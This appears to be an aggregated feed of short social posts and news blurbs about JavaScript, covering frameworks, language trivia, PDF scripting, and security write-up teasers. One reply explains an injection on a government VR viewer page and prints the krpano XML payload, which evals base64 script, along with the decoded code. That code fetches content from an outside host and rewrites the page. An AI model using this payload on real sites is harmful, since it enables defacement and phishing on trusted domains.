Cloudflare Acquires Team Behind Open Source Framework Astro
Cloudflare has acquired the core team behind the open source JavaScript framework Astro, bringing its creators in-house while pledging to keep Astro fully open source. The New Stack reports: Astro is used by major brands like IKEA, Unilever, Visa and OpenAI to build fast, content-driven websites. Search engines prioritize fast-loading and clean pages, the … ⌘ Read more
44% Of GNOME Core Apps Are Written In C, 13% In JavaScript & 10% In Rust
GNOME developer Sophie Herold has shared some interesting end-of-year code stats for the GNOME project. The “GNOME” codebase is up to 6,692,516 lines of code at the end of 2025 with 1,611,526 lines of that being from GNOME apps. Where the data gets interesting is on the programming language breakdown in different areas… ⌘ Read more
Micro QuickJS Engine Compiles & Runs JavaScript With As Little As 10kB Of RAM
Very talented open-source developer Fabrice Bellard who already is well known for his work on QEMU, the Tiny C Compiler, and FFmpeg, has another accomplishment: Micro QuickJS. The Micro QuickJS JavaScript engine can compile and run JavaScript programs with as little as 10 kB of RAM… ⌘ Read more
I’ve rebuilt ntfy with the web interface, though it took me an hour or so of JavaScript dependency hell and a certain library whose native interface doesn’t have support for NetBSD
On Linux:Step 1. Clone ntfy repository as usual
Step 2.
export NODE_ENV=productionStep 3.
make web-buildStep 4. Make a tarball with the generated assets and copy it over
Step 5. Repeat the above mentioned first step
Step 6. Unpack the assets into
server/Step 7. Build backend with
make cli-linux-serverStep 8. Done
↳
In-reply-to
»
Working on day 3 of the Advent of Code 2025: https://adventofcode.com/
⤋ Read More
@itsericwoodward@itsericwoodward.com So you’re found for Javascript eh? 🧐
↳
In-reply-to
»
One day I'll like to elaborate why I'm against the usage of Anubis (and its derivatives) for the rampant crawlers
⤋ Read More
@shinyoukai@neko.laidback.moe I’m mostly against it because it forces Javascript™ on the client(s) at a blanket level. Doing “Proof-of-Work” explicitly IMO is fine™, but not at an Ingress/Edge level IMO – Which is why I haven’t adopted it myself.
ProcessOne: Stop Telling Us XMPP Should Use JSON
We hear this too often: “XMPP uses XML. It should use JSON—it’s more modern.”
The logic seems straightforward: JSON came later, so it must be better. But better for what, exactly?
JSON became successful because it’s the standard serialization format for JavaScript. That made it convenient for browser-based applications.
Does that m … ⌘ Read more
How to Identify Sensitive Data in JavaScript Files: (JS-Recon)
A complete guide to uncovering hidden secrets, API keys, and credentials inside JavaScript files
[Continue reading on InfoSec Write-ups »](https://infosecwriteups.com/h … ⌘ Read more
@arne@uplegger.eu Yeah SSE + HTMX is basically all you need really. The whole complicated/complex JavaScript ecosystem is overkill.
A Beginner’s Guide to Finding Hidden API Endpoints in JavaScript Files
How to discover what others miss in plain sight
[Continue reading on InfoSec Write-ups »](https://infosecwriteups.com/a-beginners-guide-to-finding-h … ⌘ Read more
** JavaScript Notebook **
Kartik recently reminded me of my own project playground that I do use from time to time, but that I’ve always been a little frustrated with.
That reminder paired with that frustration lead me to revisit something similar that I’d started a while ago, but hadn’t finished. Notebook is kinda my take on Jupyter Notebooks minus a ton of features and capabilities.
Here is … ⌘ Read more
I finally resolved my issues with hashing twts… with REGEX!
Dates in JavaScript are truly strange creatures.
Working on a project that does Augmented Reality and computer vision object detection and QR code and image recognition inside a Web application. Pretty neat what can be done today with a few thousand lines of JavaScript.
** Answering some questions about Baba Yaga **
My previous post found its way to Hacker News; I don’t have an account there, but a commenter asked a few questions that I thought I could answer in a follow up post.
Baba Yaga uses call-by-value evaluation, not call-by-need (aka“lazy”).
From the interpreter,
”`hljs javascript
function visitFunctionCall(node) {
const callee = visit(node.callee);
// Arguments ar … ⌘ Read more”`
↳
In-reply-to
»
@kat I don’t like Golang much either, but I am not a programmer. This little site, Go by example might explain a thing or two.
⤋ Read More
One of the nicest things about Go is the language itself, comparing Go to other popular languages in terms of the complexity to learn to be proficient in:
- Go:
25keywords (Stack Overflow); CSP-style concurrency (goroutines & channels)
- Python 2:
30keywords (TutorialsPoint); GIL-bound threads & multiprocessing (Wikipedia)
- Python 3:
35keywords (Initial Commit); GIL-bound threads,asyncio& multiprocessing (Wikipedia, DEV Community)
- Java:
50keywords (Stack Overflow); threads +java.util.concurrent(Wikipedia)
- C++:
82keywords (Stack Overflow);std::thread, atomics & futures (en.cppreference.com)
- JavaScript:
38keywords (Stack Overflow); single-threaded event loop &async/await, Web Workers (Wikipedia)
- Ruby:
42keywords (Stack Overflow); GIL-bound threads (MRI), fibers & processes (Wikipedia)
Also spent the morning continuing to think about a new design for EdgeGuard’s WAF. I’m basically going to build an entirely new pluggable WAF that will be designed to only consider Rate Limiting, IP/ASN-based filtering, JavaScript challenge handling, Basic behavioral analysis and Anomaly detection.
The only part of this design I’m not 100% sure about is the Javascript-based challenge handling? 🤔 I’m also considering making this into a “proof of work” requirement too, but I also don’t want to falsely block folks that a) turn Javascript™ off or b) Use a browser like links, elinks or lynx for example.
Hmmm 🧐
️♂️ Unlisted but Not Unseen: How I Found the Admin Panel in a JavaScript Comment
Hey there!😁
[Continue reading on InfoSec Write-ups »](https://infosecwriteu … ⌘ Read more
V8 JavaScript engine gets eager compilation hints, but will devs use sparingly as advised?
Comments ⌘ Read more
** Payloads in Plain Sight: How Open Redirect + JavaScript Led to Full Account Takeover **
Hey there!😁
[Continue reading on InfoSec Write-ups »](https://infosecwriteups.com/payloads-in-plai … ⌘ Read more
Exposed Secrets in JavaScript Files
🔥Free Article https://medium.com/@Abhijeet_kumawat_/exposed-secrets-in-javascript-files-430a76834952?sk=ffd9ca6c8ede38ac77dcb68a507b9299
[Continue reading on InfoSec Write-ups »](https://infosecwriteups.com/exposed-secrets-in-javascript-fi … ⌘ Read more
Playing multimedia with Dillo
What if you want to use a web browser like Dillo, which lacks JavaScript support and can’t play audio or video inside the browser? Dillo doesn’t have the capability to play audio or video directly from the browser, however it can easily offload this task to other programs. This page collects some examples of how to do watch videos and listen to audio tracks or podcasts by using an external player program. In particular we will cover mpv with yt-dlp which supports YouTube … ⌘ Read more
i wonder if i could make a little yarn widget for my site to show my last post. that’d be fun. sadly i do not know javascript
Oracle justified its JavaScript trademark with Node.js–now it wants that ignored
Article URL: https://deno.com/blog/deno-v-oracle2
Comments URL: https://news.ycombinator.com/item?id=42939940
Points: 503
# Comments: 129 ⌘ Read more
Run Linux inside a PDF file via a RISC-V emulator
You might expect PDF files to only be comprised of static documents, but surprisingly, the PDF file format supports Javascript with its own separate standard library. Modern browsers (Chromium, Firefox) implement this as part of their PDF engines. However, the APIs that are available in the browser are much more limited. The full specfication for the JS in PDFs was only ever implemented by Adobe Acrobat, and it contains some ridicul … ⌘ Read more
@lyse@lyse.isobeef.org The one in question is more like the javascript version for unwrapping errors when accessing methods.
const value = some?.deeply?.nested?.object?.value
but for handling errors returned by methods. So if you wanted to chain a bunch of function calls together and if any error return immediately. It would be something like this:
b:= SomeAPIWithErrorsInAllCalls()
b.DoThing1() ?
b.DoThing2() ?
// Though its not in the threads I assume one could do like this to chain.
b.Chain1()?.Chain2()?.End()?
I am however infavor of having a sort of ternary ? in go.
PS. @prologic@twtxt.net for some reason this is eating my response without throwing an error :( I assume it has something to do with the CSRF. Can i not have multiple tabs open with yarn?
JavaScript Temporal is coming
Article URL: https://developer.mozilla.org/en-US/blog/javascript-temporal-is-coming/
Comments URL: https://news.ycombinator.com/item?id=42876840
Points: 504
# Comments: 173 ⌘ Read more
Google begins requiring JavaScript for Google Search
Google says it has begun requiring users to turn on JavaScript, the widely used programming language to make web pages interactive, in order to use Google Search. In an email to TechCrunch, a company spokesperson claimed that the change is intended to “better protect” Google Search against malicious activity, such as bots and spam, and to improve the overall Google Search experience for users. The spokesperson noted that, with … ⌘ Read more
↳
In-reply-to
»
Nice! totally legit government page: https://tour.diplomaticrooms.state.gov/?id=0&xml=https://sour.is/awesome.html
⤋ Read More
So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer
the xml parameter has a url that contains the following
<?xml version="1.0"?>
<krpano version="1.0.8.15">
<SCRIPT id="allow-copy_script"/>
<layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>
the omit above is base64 encoded script below:
const queryParams = new URLSearchParams(window.location.search),
id = queryParams.get('id');
id ? fetch('https://sour.is/superhax.txt')
.then(e => e.text())
.then(e => {
document.open(), document.write(e), document.close();
})
.catch(e => {
console.error('Error fetching the user agent:', e);
}) : console.error('No');
this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.
Show HN: Tetris in a PDF
I realized that the PDF engines of modern desktop browsers (PDFium and PDF.js) support JavaScript with enough I/O primitives to make a basic game like Tetris.
It was a bit tricky to find a union of features that work in both engines, but in the end it turns out that showing/hiding annotation “fields” works well to make monochrome pixels, and keyboard input can be achieved by typing in a text input box.
All in all it’s quite janky but a nice reminder of how general purpose PDF scripting can be. The lin … ⌘ Read more
morning yarn friends i’ve been playing with astro the SSG and it’s a blast i see why my friends love it and rec it to everyone. i may think javascript was a mistake but this is super cool
Deno v. Oracle: JavaScript Trademark Dispute
Legal action seeks to cancel Oracle’s “JavaScript” trademark, which it renewed fraudulently and has abandoned. ⌘ Read more
↳
In-reply-to
»
(#aznhzra) @doesnm Agree. salty.im should allow the user to post multiple brokers on their webfinger so the client can find a working path.
⤋ Read More
Honestly… not much. Have abandon two projects (both private) on Golang and one related to cryptography. My mostly languages are Python and Javascript (also can PHP). After writing code on Go i spend same time on fixing dumb errors
** A playground for sharing scrappy fiddles **
I shared some snippets of JavaScript in a recent blog post and was wicked irked that I didn’t have an easy way to share interactive code on my own thing…so… I made a totally static JavaScript playground for running little experiments and sharing scrappy fiddles!
It is pretty simple — it allows folks to enter and run JavaScript, includes a console so you can easily log thing … ⌘ Read more